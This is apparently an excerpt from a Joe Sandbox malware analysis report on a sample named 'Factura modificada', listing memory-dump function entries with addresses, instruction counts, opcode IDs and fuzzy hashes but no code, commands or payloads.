                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000001.00000002.1386311336.0000000001260000.00000040.00000800.00020000.00000000.sdmp, Offset: 01260000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_1_2_1260000_Factura modificada____678979879.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 2a0847ed9ab262c5d28ed5c0a50ce8397491436a9d56b77863f3182deffb8aac
                                                                                          • Instruction ID: a81afbf2d16478761a060e42b7c7a8f56cd5f0efceb377fc341a7f91eaa30fdd
                                                                                          • Opcode Fuzzy Hash: 2a0847ed9ab262c5d28ed5c0a50ce8397491436a9d56b77863f3182deffb8aac
                                                                                          • Instruction Fuzzy Hash: 7E310371D002489FDB14DFAAC590BEEBFF5AF48340F248469E549AB3A0DB359981DB90
                                                                                          Function 01263970 Relevance: .1, Instructions: 83COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000001.00000002.1386311336.0000000001260000.00000040.00000800.00020000.00000000.sdmp, Offset: 01260000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_1_2_1260000_Factura modificada____678979879.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: b40cbd2158a580aca163d1d20fc571b4f543891fd5e931758a44130502005790
                                                                                          • Instruction ID: 12dcd4c65c741a6052055358edba463b98541d1855b9eaed5f09f927935bed8b
                                                                                          • Opcode Fuzzy Hash: b40cbd2158a580aca163d1d20fc571b4f543891fd5e931758a44130502005790
                                                                                          • Instruction Fuzzy Hash: ED31F470D002489FDB14DFAAC590BDEBFF9BF48350F248029E919AB294DB759981DB90
                                                                                          Function 00E7D5DC Relevance: .1, Instructions: 75COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000001.00000002.1384221175.0000000000E7D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E7D000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_1_2_e7d000_Factura modificada____678979879.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: b2f371458d808125ddf7531990a4c33bd3973f68334363c3ae6fcdb827a1c585
                                                                                          • Instruction ID: 9cd71154fc2a4301693f442d32f49bf7a9b23a48b0f575e801bff77b8af005f4
                                                                                          • Opcode Fuzzy Hash: b2f371458d808125ddf7531990a4c33bd3973f68334363c3ae6fcdb827a1c585
                                                                                          • Instruction Fuzzy Hash: D221F1B5508204DFDB05DF50D9C0B16BB76FF98324F20C169E80D1B246C336D856CAA2
                                                                                          Function 0126F138 Relevance: .1, Instructions: 75COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000001.00000002.1386311336.0000000001260000.00000040.00000800.00020000.00000000.sdmp, Offset: 01260000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_1_2_1260000_Factura modificada____678979879.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: e694822992a838e6a6e228d3d70ecacf7fbb1ed986249dfcbbdc41639b0f1926
                                                                                          • Instruction ID: c3b96f7ca13c36f0cecc405505340d50a88f1e4576141fd8fcaf8bf3a96fa939
                                                                                          • Opcode Fuzzy Hash: e694822992a838e6a6e228d3d70ecacf7fbb1ed986249dfcbbdc41639b0f1926
                                                                                          • Instruction Fuzzy Hash: BE216B74D0020ACFDF04DFA9DA143EEBBF6EB8E310F108469D61AB3280D77449818B91
                                                                                          Function 00E8D0B4 Relevance: .1, Instructions: 74COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000001.00000002.1384311256.0000000000E8D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E8D000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_1_2_e8d000_Factura modificada____678979879.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: e884ba78c878f23d962ea57474b0a0a830e2da1cd77497786799bc66ac3db865
                                                                                          • Instruction ID: 25d00dee8b4e1d86dcb0d3a828c4fb415a7fc17dc82c186840e49f5ac3af4a81
                                                                                          • Opcode Fuzzy Hash: e884ba78c878f23d962ea57474b0a0a830e2da1cd77497786799bc66ac3db865
                                                                                          • Instruction Fuzzy Hash: 27212571609240DFDB15EF10EDC8B26BB66FB84314F24C169E80D2B282C336D816CBA2
                                                                                          Function 0126B308 Relevance: .1, Instructions: 68COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000001.00000002.1386311336.0000000001260000.00000040.00000800.00020000.00000000.sdmp, Offset: 01260000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_1_2_1260000_Factura modificada____678979879.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: faa5a2208c038c988a5319023ae90531803dcb219cdeb82db2675fac65d43b4a
                                                                                          • Instruction ID: b379353f8bde5aa71363d3aab3b2e8cf26d442dd0ba41785b9b531aea0f90c70
                                                                                          • Opcode Fuzzy Hash: faa5a2208c038c988a5319023ae90531803dcb219cdeb82db2675fac65d43b4a
                                                                                          • Instruction Fuzzy Hash: BC21B0B1F14208DFE700EFA9D5487ADBBF6FB49301F1084A9D909E3280D7784A94CB01
                                                                                          Function 07744064 Relevance: .1, Instructions: 67COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000001.00000002.1406345482.0000000007740000.00000040.00000800.00020000.00000000.sdmp, Offset: 07740000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_1_2_7740000_Factura modificada____678979879.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 94972638e820fa4bc2d41283ce8e70f2922fded18f41348dde4389ce87a96402
                                                                                          • Instruction ID: a8dc55226ea97c4e1e10aaeebb71b931e29d490726b10d91d47596400ea9fb73
                                                                                          • Opcode Fuzzy Hash: 94972638e820fa4bc2d41283ce8e70f2922fded18f41348dde4389ce87a96402
                                                                                          • Instruction Fuzzy Hash: D43197B4901228CFDB65CF29C884A9DB7F2EB89311F1184D6E91DA7314DB369E95CF40
                                                                                          Function 01261E88 Relevance: .1, Instructions: 66COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000001.00000002.1386311336.0000000001260000.00000040.00000800.00020000.00000000.sdmp, Offset: 01260000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_1_2_1260000_Factura modificada____678979879.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 7c81010d0e192c3930dc78ad0db3655fe29054702d67d7109f08259f99617638
                                                                                          • Instruction ID: 6adf05ad5370a3f471c9c7c077cc3e59f6c0e4121ff3ecac827ed7843518e14a
                                                                                          • Opcode Fuzzy Hash: 7c81010d0e192c3930dc78ad0db3655fe29054702d67d7109f08259f99617638
                                                                                          • Instruction Fuzzy Hash: 2D21CC32E01208AFDB15DBB4C8906DDBBF6EF8A320F2085A6E501BB291DB306D55CB50
                                                                                          Function 0126B318 Relevance: .1, Instructions: 64COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000001.00000002.1386311336.0000000001260000.00000040.00000800.00020000.00000000.sdmp, Offset: 01260000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_1_2_1260000_Factura modificada____678979879.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 7ef2218d8a4503462be956fc8844d3db9da5a01f8c8185d67261bbc74c6d4c11
                                                                                          • Instruction ID: a172b160c8f0670046e2be2624710ecb85df994680042e0564eb56139e0c2bed
                                                                                          • Opcode Fuzzy Hash: 7ef2218d8a4503462be956fc8844d3db9da5a01f8c8185d67261bbc74c6d4c11
                                                                                          • Instruction Fuzzy Hash: 982151B0F14208DFDB40EFA9C5497ADBBF9FB49301F1485A9D909E3284D7744A94CB41
                                                                                          Function 01261E98 Relevance: .1, Instructions: 63COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000001.00000002.1386311336.0000000001260000.00000040.00000800.00020000.00000000.sdmp, Offset: 01260000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_1_2_1260000_Factura modificada____678979879.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: ace76f0cb38364eb06742fff1c6ae8fdd5c2aa1835b0073c3811db72e79df431
                                                                                          • Instruction ID: 69c1c9088bccd7153b20a70c9233c4221fd04be719c19deceab563ec307da2d2
                                                                                          • Opcode Fuzzy Hash: ace76f0cb38364eb06742fff1c6ae8fdd5c2aa1835b0073c3811db72e79df431
                                                                                          • Instruction Fuzzy Hash: EE219D32E01208AFDF15DFB5D980ADEBBF6AF89350F108166E505B7241DA306D55CBA1
                                                                                          Function 0126F4B0 Relevance: .1, Instructions: 58COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000001.00000002.1386311336.0000000001260000.00000040.00000800.00020000.00000000.sdmp, Offset: 01260000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_1_2_1260000_Factura modificada____678979879.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 981a41135a89cd9c1766c5167ae4259378e04f1e7c1482b42c5435dd28657087
                                                                                          • Instruction ID: e18580bd451ac73aae766b5ba2233997bcb2915c9e657c3b4d893f12ef27ed87
                                                                                          • Opcode Fuzzy Hash: 981a41135a89cd9c1766c5167ae4259378e04f1e7c1482b42c5435dd28657087
                                                                                          • Instruction Fuzzy Hash: 071149B0D1421ACFDF04CF99E9556EEBBFAFB88310F108026D615B3290D7741984CB90
                                                                                          Function 0775A570 Relevance: .1, Instructions: 58COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000001.00000002.1406345482.0000000007740000.00000040.00000800.00020000.00000000.sdmp, Offset: 07740000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_1_2_7740000_Factura modificada____678979879.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 168ea65dfe5b80513c9fb374d784d57181dbdd2c702d735ec0e20eadf3fadf42
                                                                                          • Instruction ID: 7564f0cdb66e9d013d10682d693a949bde750d8f9654ca44c381106ece23bbf9
                                                                                          • Opcode Fuzzy Hash: 168ea65dfe5b80513c9fb374d784d57181dbdd2c702d735ec0e20eadf3fadf42
                                                                                          • Instruction Fuzzy Hash: 3521CDB4A0021ACFCB05DFA8C544AAEBBF2EB48311F108969D919BB350D735A940CFA1
                                                                                          Function 00E7D5D7 Relevance: .1, Instructions: 56COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000001.00000002.1384221175.0000000000E7D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E7D000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_1_2_e7d000_Factura modificada____678979879.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 099256442a3ab3004f72329a4e4b6c70090b87d396c4978555b43c732be305a7
                                                                                          • Instruction ID: a60cb45da78f88a67221b58ef559a76f53030a234db7a6f6d41129163b9ba742
                                                                                          • Opcode Fuzzy Hash: 099256442a3ab3004f72329a4e4b6c70090b87d396c4978555b43c732be305a7
                                                                                          • Instruction Fuzzy Hash: 9511AF76504244CFCB06DF50D9C4B16BF72FB94324F24C6A9D8490B256C33AD856CBA2
                                                                                          Function 00E8D0AF Relevance: .1, Instructions: 55COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000001.00000002.1384311256.0000000000E8D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E8D000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_1_2_e8d000_Factura modificada____678979879.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: fa649175a6a07c1293a0646eeb1dae1d7184f3825364c931512ed0431d75e21e
                                                                                          • Instruction ID: 3911f56ce049548038b2d1e955ffd238aefaaa25903b04bae03e56c1fbb4efe7
                                                                                          • Opcode Fuzzy Hash: fa649175a6a07c1293a0646eeb1dae1d7184f3825364c931512ed0431d75e21e
                                                                                          • Instruction Fuzzy Hash: E411B176509280DFCB05DF10D9C4B16BF72FB84318F2481A9D80D5B696C33AD81ACBA2
                                                                                          Function 01262530 Relevance: .0, Instructions: 48COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000001.00000002.1386311336.0000000001260000.00000040.00000800.00020000.00000000.sdmp, Offset: 01260000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_1_2_1260000_Factura modificada____678979879.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 7e6974b6ae801283481eb2f9ae5126888a7c2e6f6670d33d14b2c1b12956c7c5
                                                                                          • Instruction ID: c5497c94afce67872223a201348cf8ed8336a1ebb09694505202b8301a307f1c
                                                                                          • Opcode Fuzzy Hash: 7e6974b6ae801283481eb2f9ae5126888a7c2e6f6670d33d14b2c1b12956c7c5
                                                                                          • Instruction Fuzzy Hash: 71019232D0474B8BCB109BB9D8146DDBB71EFCA320F258752D615771A0EB70259ACBA1
                                                                                          Function 012619C8 Relevance: .0, Instructions: 46COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000001.00000002.1386311336.0000000001260000.00000040.00000800.00020000.00000000.sdmp, Offset: 01260000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_1_2_1260000_Factura modificada____678979879.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 9017de8dab617e70c38546d64854ff90f0f146cbd91b0522aa3d534821e93969
                                                                                          • Instruction ID: 929056cc2a4ff0e774cd053e907323c7f91854b4e9d1a0b325ac00aa2b6c07bc
                                                                                          • Opcode Fuzzy Hash: 9017de8dab617e70c38546d64854ff90f0f146cbd91b0522aa3d534821e93969
                                                                                          • Instruction Fuzzy Hash: C1012632E202898BDF158774C424AEEBFB6DF85310F0489AAC042EB291DEB1191AC7C1
                                                                                          Function 0775F598 Relevance: .0, Instructions: 46COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000001.00000002.1406345482.0000000007740000.00000040.00000800.00020000.00000000.sdmp, Offset: 07740000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_1_2_7740000_Factura modificada____678979879.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: c98ae001639984126292c2778e6ac5b559e94c9f6034e4cb7d72170079f14a30
                                                                                          • Instruction ID: 986d77376c7da9a4e8e505aac23caf7fb01eafe5d88a23658643d6232832f155
                                                                                          • Opcode Fuzzy Hash: c98ae001639984126292c2778e6ac5b559e94c9f6034e4cb7d72170079f14a30
                                                                                          • Instruction Fuzzy Hash: F411F7B0E0020A9FDB44DFA9C9417AEBBF1FF88300F10846AD519A7354EB305A419B91
                                                                                          Function 00E7D005 Relevance: .0, Instructions: 45COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000001.00000002.1384221175.0000000000E7D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E7D000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_1_2_e7d000_Factura modificada____678979879.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 31bb8058d14a88074ebe8cf5ff3e76d5e067622527cde8c057b40f2efea58305
                                                                                          • Instruction ID: 0211035a8da2ab9303b2f81e44633412e251fd3d766ba24cff79652c1dd683b7
                                                                                          • Opcode Fuzzy Hash: 31bb8058d14a88074ebe8cf5ff3e76d5e067622527cde8c057b40f2efea58305
                                                                                          • Instruction Fuzzy Hash: 0C01296110E3C09ED7128B258C94B52BFB8DF53228F19C1DBE9889F2A3C2695C49C772
                                                                                          Function 00E7D01D Relevance: .0, Instructions: 45COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000001.00000002.1384221175.0000000000E7D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E7D000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_1_2_e7d000_Factura modificada____678979879.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: bd3b97e8b4237cd42d1eb6a8283e2ce7805cafbcae791e271730745b6e16fa4f
                                                                                          • Instruction ID: 55ff7e8dfa5684d4aa4d3755213580848c59ea93a400c68ebd48a8fe48e9d506
                                                                                          • Opcode Fuzzy Hash: bd3b97e8b4237cd42d1eb6a8283e2ce7805cafbcae791e271730745b6e16fa4f
                                                                                          • Instruction Fuzzy Hash: 5301F23150C3009EE7204A21CCC4B66BFA9DF41329F18E11AED4C6F286C2799C46CAB2
                                                                                          Function 01261948 Relevance: .0, Instructions: 42COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000001.00000002.1386311336.0000000001260000.00000040.00000800.00020000.00000000.sdmp, Offset: 01260000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_1_2_1260000_Factura modificada____678979879.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 2b05723567e0a4d0a081aa8631d69e4ff70564a28e09884659ee7bab2211f4dc
                                                                                          • Instruction ID: 190013594e675f08f2ceff63a0238d2a053ddbda34ff7a858bfb8f3015f4afd4
                                                                                          • Opcode Fuzzy Hash: 2b05723567e0a4d0a081aa8631d69e4ff70564a28e09884659ee7bab2211f4dc
                                                                                          • Instruction Fuzzy Hash: A8018F32D00B0B8BCB14DBA5D8405EDBB72EFCA320F154622D215771A0EB70259ACB91
                                                                                          Function 01262048 Relevance: .0, Instructions: 38COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000001.00000002.1386311336.0000000001260000.00000040.00000800.00020000.00000000.sdmp, Offset: 01260000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_1_2_1260000_Factura modificada____678979879.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 6f07c7a3ff7da1063d99868cc45d9e9a10b5535dc94b9b2afca299a5713a7aa0
                                                                                          • Instruction ID: f192ec03890672d9afc11f0c6799e1ed1482859c5c4012892734f4295e8e2bd5
                                                                                          • Opcode Fuzzy Hash: 6f07c7a3ff7da1063d99868cc45d9e9a10b5535dc94b9b2afca299a5713a7aa0
                                                                                          • Instruction Fuzzy Hash: 46F0A431E102499BDF158B34C4689FEBFB69F85300F5449AAD482AB291DE711906C782
                                                                                          Function 012625B7 Relevance: .0, Instructions: 38COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000001.00000002.1386311336.0000000001260000.00000040.00000800.00020000.00000000.sdmp, Offset: 01260000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_1_2_1260000_Factura modificada____678979879.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 9313b8e482ff1124e8b703a4b98dbafe88903ac9ae7973d9eccdaff22582200b
                                                                                          • Instruction ID: cf206dadd6da3a4433bd632eb215b25b88fc742afd5ffdb4fb85b98e3f8fee72
                                                                                          • Opcode Fuzzy Hash: 9313b8e482ff1124e8b703a4b98dbafe88903ac9ae7973d9eccdaff22582200b
                                                                                          • Instruction Fuzzy Hash: AAF0AF32D142099FDF15DB34C469AEEBFB19F88700F04456AC842AB290DEB0590B8781
                                                                                          Function 077425F5 Relevance: .0, Instructions: 35COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000001.00000002.1406345482.0000000007740000.00000040.00000800.00020000.00000000.sdmp, Offset: 07740000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_1_2_7740000_Factura modificada____678979879.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 961a021a1117d17214f1ddd166c6affb403fc99ec14c74ffc267f2ae2eb7ad67
                                                                                          • Instruction ID: 7e001267d463a007ee11e555a87550176798ab8870cd16e2c208287a6a6fdbd0
                                                                                          • Opcode Fuzzy Hash: 961a021a1117d17214f1ddd166c6affb403fc99ec14c74ffc267f2ae2eb7ad67
                                                                                          • Instruction Fuzzy Hash: 791178B8A112298FDB68DF29D898A99B7F1FB49300F1085E5A51EA7344EB345F84CF41
                                                                                          Function 012619D8 Relevance: .0, Instructions: 33COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000001.00000002.1386311336.0000000001260000.00000040.00000800.00020000.00000000.sdmp, Offset: 01260000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_1_2_1260000_Factura modificada____678979879.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: a0647ab6796736a45c631b6203a7b42d8d5733f5d2a33e49936bd927ece0297d
                                                                                          • Instruction ID: cd3516dab200d77f8355025b5678a9c217cf93fa7020e37d3a1ecbe5f579ec85
                                                                                          • Opcode Fuzzy Hash: a0647ab6796736a45c631b6203a7b42d8d5733f5d2a33e49936bd927ece0297d
                                                                                          • Instruction Fuzzy Hash: B6F08232E202099BDF15DB64C855AEFBBFA9F84310F55842AD413F7380EEB56906C6D2
                                                                                          Function 012625C8 Relevance: .0, Instructions: 32COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000001.00000002.1386311336.0000000001260000.00000040.00000800.00020000.00000000.sdmp, Offset: 01260000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_1_2_1260000_Factura modificada____678979879.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: b4f2296d97fe0cb86c97234db39c055c8bc95d3d1932e2a772fe783059b0224d
                                                                                          • Instruction ID: 9e34260f9348a3266eea1619c58aae1501defe4ff41c699770250f5d755a815e
                                                                                          • Opcode Fuzzy Hash: b4f2296d97fe0cb86c97234db39c055c8bc95d3d1932e2a772fe783059b0224d
                                                                                          • Instruction Fuzzy Hash: 0EF08232E102099BDF15DB64C859AEFBBBA9B88710F41852A9402B7380DEB0590687D1
                                                                                          Function 0126BB84 Relevance: .0, Instructions: 30COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000001.00000002.1386311336.0000000001260000.00000040.00000800.00020000.00000000.sdmp, Offset: 01260000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_1_2_1260000_Factura modificada____678979879.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 5ff00a198c610759bd6bbf55e31af84f6c976d3211f3d77ee43e2d8b6bbcfc02
                                                                                          • Instruction ID: 1344cb9cfb4b9a429e02d81289b677c5fc8659fc807b8f67011ff0e2a06698c5
                                                                                          • Opcode Fuzzy Hash: 5ff00a198c610759bd6bbf55e31af84f6c976d3211f3d77ee43e2d8b6bbcfc02
                                                                                          • Instruction Fuzzy Hash: 2A01D2B0D1622ECAFB34DF29CD59B98B6B5BB44300F0082E9C50DA3299E7B40AC5CF00
                                                                                          Function 0126277F Relevance: .0, Instructions: 29COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000001.00000002.1386311336.0000000001260000.00000040.00000800.00020000.00000000.sdmp, Offset: 01260000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_1_2_1260000_Factura modificada____678979879.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 0b5cefa7e1396be881a2086b1d0f70e34c2678b004930c58084da13c58c6d3e3
                                                                                          • Instruction ID: 67cc243f1c84dae9ca08c885b686a662152dde58b5b18644b28078a51fd5b167
                                                                                          • Opcode Fuzzy Hash: 0b5cefa7e1396be881a2086b1d0f70e34c2678b004930c58084da13c58c6d3e3
                                                                                          • Instruction Fuzzy Hash: 05F05E303102148FC74AAB78906927C37D3ABC9701B244928D40ADF3C4DF756C8A9782
                                                                                          Function 012618E0 Relevance: .0, Instructions: 28COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000001.00000002.1386311336.0000000001260000.00000040.00000800.00020000.00000000.sdmp, Offset: 01260000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_1_2_1260000_Factura modificada____678979879.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: c629a8033c296bd7d2d024128db1881e2366f73653aabd7f5f10ffe85af3f9ce
                                                                                          • Instruction ID: 9f760f1532206ce6c23ddb86ad6ccebd06f1c6707f1d48ef074592872f3e7926
                                                                                          • Opcode Fuzzy Hash: c629a8033c296bd7d2d024128db1881e2366f73653aabd7f5f10ffe85af3f9ce
                                                                                          • Instruction Fuzzy Hash: BAF0A73020D3C08EDB17973554293E87F629FD3346F2C44EEC08E976A6D9365856DB00
                                                                                          Function 0775DF48 Relevance: .0, Instructions: 23COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000001.00000002.1406345482.0000000007740000.00000040.00000800.00020000.00000000.sdmp, Offset: 07740000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_1_2_7740000_Factura modificada____678979879.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 23a1750582a5c4c640aefcf785df2ecc10e7786c034820e34712d9b849f48d9a
                                                                                          • Instruction ID: 6f5b2c359d380f0f25bdfdea949d2722370809a4c4c36091d1a2e4e0285fcc8d
                                                                                          • Opcode Fuzzy Hash: 23a1750582a5c4c640aefcf785df2ecc10e7786c034820e34712d9b849f48d9a
                                                                                          • Instruction Fuzzy Hash: D7E0C9B4E04208EFCB54DFA8D54069CBBF4EB49310F10C0AA9C19A3354D6719A51DF40
                                                                                          Function 0775D710 Relevance: .0, Instructions: 23COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000001.00000002.1406345482.0000000007740000.00000040.00000800.00020000.00000000.sdmp, Offset: 07740000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_1_2_7740000_Factura modificada____678979879.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 23a1750582a5c4c640aefcf785df2ecc10e7786c034820e34712d9b849f48d9a
                                                                                          • Instruction ID: c6d23842057765de542ef1b11f3ad937fb4402b04a971ef624ded1f3942d93b1
                                                                                          • Opcode Fuzzy Hash: 23a1750582a5c4c640aefcf785df2ecc10e7786c034820e34712d9b849f48d9a
                                                                                          • Instruction Fuzzy Hash: EDE0C9B4E04208EFCB54DFA9D58069CFBF4EB49310F10C4AA9C18A3350D7719A51DF40
                                                                                          Function 0775BE48 Relevance: .0, Instructions: 23COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000001.00000002.1406345482.0000000007740000.00000040.00000800.00020000.00000000.sdmp, Offset: 07740000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
